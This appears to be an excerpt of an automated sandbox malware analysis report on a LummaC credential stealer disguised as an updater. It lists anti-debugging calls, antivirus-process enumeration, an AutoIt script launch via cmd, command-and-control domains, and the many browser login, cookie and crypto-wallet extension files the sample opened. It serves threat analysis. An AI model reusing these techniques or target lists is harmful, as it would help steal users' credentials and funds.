Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01403CA5 mov eax, dword ptr fs:[00000030h] 35_2_01403CA5
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B820BE GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation, 35_2_00B820BE
Enables debug privileges
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B52446 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 35_2_00B52446
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B40E4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 35_2_00B40E4D
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B40F9F SetUnhandledExceptionFilter, 35_2_00B40F9F
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B411EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 35_2_00B411EE
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Memory protected: page readonly | page read and write | page guard | page no cache Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
LummaC encrypted strings found
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: servicedny.site
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: authorisev.site
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: faulteyotk.site
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: dilemmadu.site
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: contemteny.site
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: goalyfeastz.site
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: opposezmny.site
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: seallysl.site
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8230F LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 35_2_00B8230F
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B32D33 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 35_2_00B32D33
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8C078 SendInput,keybd_event, 35_2_00B8C078
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00BA2E89 GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 35_2_00BA2E89
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" /VERYSILENT Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\bYrIyAT.a3x && del C:\ProgramData\\bYrIyAT.a3x Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\hangbird\Updater.exe updater.exe C:\ProgramData\\bYrIyAT.a3x Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B81C68 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 35_2_00B81C68
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B82777 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 35_2_00B82777
Source: Updater.exe, 0000001C.00000000.1715428534.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmp, is-7LJOT.tmp.3.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Updater.exe Binary or memory string: Shell_TrayWnd
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B40CA4 cpuid 35_2_00B40CA4
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 35_2_013F2BBD
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: GetLocaleInfoA,GetACP, 35_2_013F90D9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: GetLocaleInfoA, 35_2_013F34E1
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: GetLocaleInfoA, 35_2_013F7B41
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: GetLocaleInfoA, 35_2_013F7B8D
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 35_2_013F2CC7
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the product ID of Windows
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B98C58 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW, 35_2_00B98C58
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B659C7 GetUserNameW, 35_2_00B659C7
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B5B99F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 35_2_00B5B99F
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B3310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 35_2_00B3310D
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: find.exe, 00000013.00000002.1709477597.0000021154610000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000013.00000002.1709402244.000002115444B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgui.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
